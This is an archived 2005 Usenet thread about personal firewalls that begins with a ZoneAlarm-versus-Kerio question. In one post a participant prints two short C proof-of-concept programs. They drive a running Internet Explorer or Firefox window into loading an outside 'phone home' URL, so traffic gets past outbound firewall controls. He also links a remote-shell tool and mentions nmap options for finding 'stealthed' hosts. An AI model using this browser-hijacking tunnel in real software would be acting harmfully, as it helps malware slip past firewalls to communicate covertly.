Sign in with
Sign up | Sign in
Your question

Zone Alarm vs Kerio

Last response: in Networking
Share
Anonymous
a b 8 Security
August 19, 2005 6:39:48 PM

Archived from groups: comp.security.firewalls (More info?)

Which is better and why?
--
Wattsville Blues

Gimme some sugar, baby!

More about : zone alarm kerio

Anonymous
a b 8 Security
August 20, 2005 12:41:26 AM

Archived from groups: comp.security.firewalls (More info?)

In article <de4qvk$70m$1@nwrdmz01.dmz.ncs.ea.ibs-infra.bt.com>,
nothing@nothing.net says...
> Which is better and why?
>

It obviously depends on what your needs are and what you want...

--
Kerodo
Anonymous
a b 8 Security
August 20, 2005 4:46:26 PM

Archived from groups: comp.security.firewalls (More info?)

Kerodo wrote:
> In article <de4qvk$70m$1@nwrdmz01.dmz.ncs.ea.ibs-infra.bt.com>,
> nothing@nothing.net says...
>
>>Which is better and why?
>>
>
>
> It obviously depends on what your needs are and what you want...
>

Obviously. I'm not a really advanced user so can you be more specific
about what I should detail about my needs?

--
Wattsville Blues

Gimme some sugar, baby!
Related resources
Anonymous
a b 8 Security
August 20, 2005 7:54:59 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> Which is better and why?

Just use the Windows-Firewall.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 20, 2005 7:55:00 PM

Archived from groups: comp.security.firewalls (More info?)

Volker Birk wrote:
> Wattsville Blues <nothing@nothing.net> wrote:
>
>>Which is better and why?
>
>
> Just use the Windows-Firewall.
>
> Yours,
> VB.

I'm afraid that won't do, I need a firewall to control outbound connections.

--
Wattsville Blues

Gimme some sugar, baby!
Anonymous
a b 8 Security
August 20, 2005 9:06:44 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> >>Which is better and why?
> > Just use the Windows-Firewall.
> I'm afraid that won't do, I need a firewall to control outbound connections.

Unfortunately, it's not possible to control outbound traffic reliable,
because of tunneling.

A simple test proofes this: http://www.dingens.org/breakout.c
Just start an Internet Explorer, and test it for your own, your
"Personal Firewall" activated.

In our tests every of the tested "Personal Firewalls" failed to detect
even such simple tunneling methods. Alexander Bernauer then wrote a
simple remote shell with this POC, the wwwsh. And no "Personal Firewall"
was able to detain this remote control software, as expected (you can
download the code here: http://copton.net/vortraege/pfw/wwwsh.tar.bz2).

Even, if the "Personal Firewall" providers will extend their efforts,
and will try to prevent this in future releases, there are so many
possibilities to tunnel, that this attempt cannot not succeed.

So it's true unfortunately, that the only type of application the
"Personal Firewalls" are able to stop communicating, are the programs,
which admit to be controlled.

Yes, some more harmless malware is like this, but I doubt, that this is
what you intend to stop communicating.

The only way to avoid unwanted software on your PC is not installing
and executing it. If it's running, mostly it's too late.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 20, 2005 9:06:45 PM

Archived from groups: comp.security.firewalls (More info?)

In article <43074704@news.uni-ulm.de>, bumens@dingens.org says...
> Wattsville Blues <nothing@nothing.net> wrote:
> > >>Which is better and why?
> > > Just use the Windows-Firewall.
> > I'm afraid that won't do, I need a firewall to control outbound connections.
>
> Unfortunately, it's not possible to control outbound traffic reliable,
> because of tunneling.
>
> A simple test proofes this: http://www.dingens.org/breakout.c
> Just start an Internet Explorer, and test it for your own, your
> "Personal Firewall" activated.
>

Does this apply to other browsers also, or is it just IE..

--
Kerodo
Anonymous
a b 8 Security
August 21, 2005 2:55:35 AM

Archived from groups: comp.security.firewalls (More info?)

Kerodo <loopback@localhost.com> wrote:
> > A simple test proofes this: http://www.dingens.org/breakout.c
> > Just start an Internet Explorer, and test it for your own, your
> > "Personal Firewall" activated.
> Does this apply to other browsers also, or is it just IE..

http://www.dingens.org/breakout-mozilla-firefox.c

This works with any browser.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 21, 2005 2:55:36 AM

Archived from groups: comp.security.firewalls (More info?)

"Volker Birk" <bumens@dingens.org> wrote in message
news:430798c7@news.uni-ulm.de...
> Kerodo <loopback@localhost.com> wrote:
>> > A simple test proofes this: http://www.dingens.org/breakout.c
>> > Just start an Internet Explorer, and test it for your own, your
>> > "Personal Firewall" activated.
>> Does this apply to other browsers also, or is it just IE..
>
> http://www.dingens.org/breakout-mozilla-firefox.c
>
> This works with any browser.
>
> Yours,
> VB.
> --
> "Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
> deutschen Schlafzimmern passiert".
> Harald Schmidt zum "Weltjugendtag"


What's supposed to happen when I go to this URL ???
Anonymous
a b 8 Security
August 21, 2005 2:55:36 AM

Archived from groups: comp.security.firewalls (More info?)

In article <430798c7@news.uni-ulm.de>, bumens@dingens.org says...
> Kerodo <loopback@localhost.com> wrote:
> > > A simple test proofes this: http://www.dingens.org/breakout.c
> > > Just start an Internet Explorer, and test it for your own, your
> > > "Personal Firewall" activated.
> > Does this apply to other browsers also, or is it just IE..
>
> http://www.dingens.org/breakout-mozilla-firefox.c
>
> This works with any browser.
>

Ok, thanks, that's what I wanted to know.

--
Kerodo
Anonymous
a b 8 Security
August 21, 2005 3:55:13 AM

Archived from groups: comp.security.firewalls (More info?)

Anonymous <Anonymous@nowhere.com> wrote:
> > http://www.dingens.org/breakout-mozilla-firefox.c
> What's supposed to happen when I go to this URL ???

You'll see C source code for a POC, how to communicate outside in spite
of any "Personal Firewall". This POC requires, that the browser is already
running.

If you believe, that this is a problem, I will post a POC, how to start
the browser without having problems with a "Personal Firewall", too.

First the Internet Explorer version:

--------------------------- snip ------------------------------------------
#include <windows.h>

int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
int nCmdShow)
{
HWND ie = FindWindowEx(NULL, NULL, "IEFrame", NULL);
HWND wrk, tb, cbx, cb, url;

if (ie == NULL) {
MessageBox(NULL, "Please open an Internet Explorer window, or"
"I will goin' to open one myself ;-)",
"Oooh!", MB_OK | MB_ICONEXCLAMATION);

return 0;
}

wrk = FindWindowEx(ie, NULL, "WorkerW", NULL);
tb = FindWindowEx(wrk, NULL, "ReBarWindow32", NULL);
cbx = FindWindowEx(tb, NULL, "ComboBoxEx32", NULL);
cb = FindWindowEx(cbx, NULL, "ComboBox", NULL);
url = FindWindowEx(cb, NULL, "Edit", NULL);

SendMessage(url, WM_SETTEXT, NULL, "http://www.dingens.org/breakout.html");
PostMessage(url, WM_SETFOCUS, 0, 0);
PostMessage(url, WM_KEYDOWN, VK_RETURN, 0);
return 0;
}
--------------------------- snap ------------------------------------------

and here the Mozilla Firefox version:

--------------------------- snip ------------------------------------------
#include <windows.h>

const char *phoneHome = "http://www.dingens.org/breakout.html";

int __stdcall WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine,
int nCmdShow)
{
HWND browser = FindWindowEx(NULL, NULL, "MozillaWindowClass", NULL);
HWND wnd = FindWindowEx(browser, NULL, "MozillaWindowClass", NULL);
int i;

SetForegroundWindow(wnd);

PostMessage(wnd, WM_CHAR, (WPARAM) 9, 0);

for (i=0; i<strlen(phoneHome); i++)
PostMessage(wnd, WM_CHAR, (WPARAM) phoneHome, NULL);

PostMessage(wnd, WM_KEYDOWN, (WPARAM) VK_RETURN, NULL);

return 0;
}
--------------------------- snap ------------------------------------------

Believe me, this is only the simplest of hundreds of possibilities to
do tunneling. I just tried it first, because it's so easy.

Every "Personal Firewall" screwed up already with such simple tricks.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 21, 2005 3:10:12 PM

Archived from groups: comp.security.firewalls (More info?)

Volker Birk wrote:
> Wattsville Blues <nothing@nothing.net> wrote:
>
>>Which is better and why?
>
>
> Just use the Windows-Firewall.
>
> Yours,
> VB.

The Windows firewall still responds to pings. How can I stop it doing this?

--
Wattsville Blues

Gimme some sugar, baby!
Anonymous
a b 8 Security
August 21, 2005 3:17:47 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues wrote:
> Volker Birk wrote:
>
>> Wattsville Blues <nothing@nothing.net> wrote:
>>
>>> Which is better and why?
>>
>>
>>
>> Just use the Windows-Firewall.
>>
>> Yours,
>> VB.
>
>
> The Windows firewall still responds to pings. How can I stop it doing
> this?
>

Disregard.
Anonymous
a b 8 Security
August 21, 2005 6:28:20 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> The Windows firewall still responds to pings. How can I stop it doing this?

Why do you want to do this? The IP stack of Windows has no bugs with
ICMP echo any more, so it's useless to stop it.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 21, 2005 6:28:21 PM

Archived from groups: comp.security.firewalls (More info?)

Volker Birk wrote:
> Wattsville Blues <nothing@nothing.net> wrote:
>
>>The Windows firewall still responds to pings. How can I stop it doing this?
>
>
> Why do you want to do this? The IP stack of Windows has no bugs with
> ICMP echo any more, so it's useless to stop it.
>
> Yours,
> VB.

Easy tiger, I'm just a novice and you lost me there! I just like to be
stealthed.

Oh, and I cancelled those other messages - I'd no idea that could be
done, so cheers!

--
Wattsville Blues

Gimme some sugar, baby!
Anonymous
a b 8 Security
August 21, 2005 6:29:45 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> >> Just use the Windows-Firewall.
> > The Windows firewall still responds to pings. How can I stop it doing
> > this?
> Disregard.

BTW: you could also cancel your article. Just read the documentation of
your newsreader.

F'up2P,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 21, 2005 8:07:40 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> >>The Windows firewall still responds to pings. How can I stop it doing this?
> > Why do you want to do this? [...]
> [...] I just like to be stealthed.

This is impossible.

The "stealth"-features of the "Personal Firewalls" all are based on
misunderstanding ICMP.

It is not possible to make a PC "invisible" in the Internet by a Software
running on this PC if it's connected, because an host seems to be not
there only, if a router before the host sends ICMP Destination Unreachable
with code 0 (net unreachable) or code 1 (host unreachable), see RFC 791 /
STD 0005, http://www.rfc-editor.org.

Therefore i.e. portscanners have no problem to detect a PC, which is
"stealthed" by any "Personal Firewall".

For example, with nmap use the parameter -P0 to detect PCs, which are
"stealthed".

I don't know, if the providers of the "Personal Firewalls" don't
understand the Internet Protocol family, or if they're lying to
sell their products with non-existing "stealth"-features.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 21, 2005 8:07:41 PM

Archived from groups: comp.security.firewalls (More info?)

Volker Birk wrote:
> Wattsville Blues <nothing@nothing.net> wrote:
>
>>>>The Windows firewall still responds to pings. How can I stop it doing this?
>>>
>>>Why do you want to do this? [...]
>>
>>[...] I just like to be stealthed.
>
>
> This is impossible.
>
> The "stealth"-features of the "Personal Firewalls" all are based on
> misunderstanding ICMP.
>
> It is not possible to make a PC "invisible" in the Internet by a Software
> running on this PC if it's connected, because an host seems to be not
> there only, if a router before the host sends ICMP Destination Unreachable
> with code 0 (net unreachable) or code 1 (host unreachable), see RFC 791 /
> STD 0005, http://www.rfc-editor.org.
>
> Therefore i.e. portscanners have no problem to detect a PC, which is
> "stealthed" by any "Personal Firewall".
>
> For example, with nmap use the parameter -P0 to detect PCs, which are
> "stealthed".
>
> I don't know, if the providers of the "Personal Firewalls" don't
> understand the Internet Protocol family, or if they're lying to
> sell their products with non-existing "stealth"-features.
>
> Yours,
> VB.

Jeus, forget I said anything.

--
Wattsville Blues

Gimme some sugar, baby!
Anonymous
a b 8 Security
August 21, 2005 8:44:08 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> > I don't know, if the providers of the "Personal Firewalls" don't
> > understand the Internet Protocol family, or if they're lying to
> > sell their products with non-existing "stealth"-features.
> Jeus, forget I said anything.

Sorry, I didn't want to scare away you ;-)

I just wanted to explain, why the advertisment of the "Personal Firewall"
providers is rank nonsense. What they're claiming, their products should
accomplish, just is impossible.

There is a gap between reality and advertisment here - and not only here,
I'm sorry.

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 21, 2005 10:55:16 PM

Archived from groups: comp.security.firewalls (More info?)

Volker Birk wrote:
> Wattsville Blues <nothing@nothing.net> wrote:
>
>>>I don't know, if the providers of the "Personal Firewalls" don't
>>>understand the Internet Protocol family, or if they're lying to
>>>sell their products with non-existing "stealth"-features.
>>
>>Jeus, forget I said anything.
>
>
> Sorry, I didn't want to scare away you ;-)
>
> I just wanted to explain, why the advertisment of the "Personal Firewall"
> providers is rank nonsense. What they're claiming, their products should
> accomplish, just is impossible.
>
> There is a gap between reality and advertisment here - and not only here,
> I'm sorry.
>
> Yours,
> VB.

You're not one of those people who thinks using AV software is a bad
idea are you?

--
Wattsville Blues

Gimme some sugar, baby!
Anonymous
a b 8 Security
August 22, 2005 1:29:07 AM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> You're not one of those people who thinks using AV software is a bad
> idea are you?

No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
the constraints they're subjected.

Why?

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 22, 2005 1:39:04 AM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> You're not one of those people who thinks using AV software is a bad
> idea are you?

No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
the constraints they're subjecting.

Why?

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 22, 2005 5:00:50 AM

Archived from groups: comp.security.firewalls (More info?)

Volker Birk wrote:
> Wattsville Blues <nothing@nothing.net> wrote:
>
>>You're not one of those people who thinks using AV software is a bad
>>idea are you?
>
>
> No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
> the constraints they're subjecting.
>
> Why?
>
> Yours,
> VB.

Firewalls are one thing, but people who think than AVs are worthless are
idiots.

--
Wattsville Blues

Gimme some sugar, baby!
Anonymous
a b 8 Security
August 22, 2005 2:00:44 PM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues <nothing@nothing.net> wrote:
> >>You're not one of those people who thinks using AV software is a bad
> >>idea are you?
> > No, I'm not. Anti-Virus tools can be utilized sensible, if one knows
> > the constraints they're subjecting.
> > Why?
> Firewalls are one thing, but people who think than AVs are worthless are
> idiots.

Oh, then I'm lucky not being called an idiot by you ;-) Thanx! :-P

Yours,
VB.
--
"Es kann nicht sein, dass die Frustrierten in Rom bestimmen, was in
deutschen Schlafzimmern passiert".
Harald Schmidt zum "Weltjugendtag"
Anonymous
a b 8 Security
August 23, 2005 2:01:18 AM

Archived from groups: comp.security.firewalls (More info?)

Wattsville Blues wrote:

> Which is better and why?

That's like asking:

"Deux Chevaux vs. Trebant.

Which is better and why?"

Get a hardware firewall.
Anonymous
a b 8 Security
August 23, 2005 4:50:04 PM

Archived from groups: comp.security.firewalls (More info?)

I am a Sock Puppet wrote:
> Wattsville Blues wrote:
>
>> Which is better and why?
>
>
> That's like asking:
>
> "Deux Chevaux vs. Trebant.
>
> Which is better and why?"
>
> Get a hardware firewall.
>

I already have one, I need one to control outbound access.

--
Wattsville Blues

Gimme some sugar, baby!
!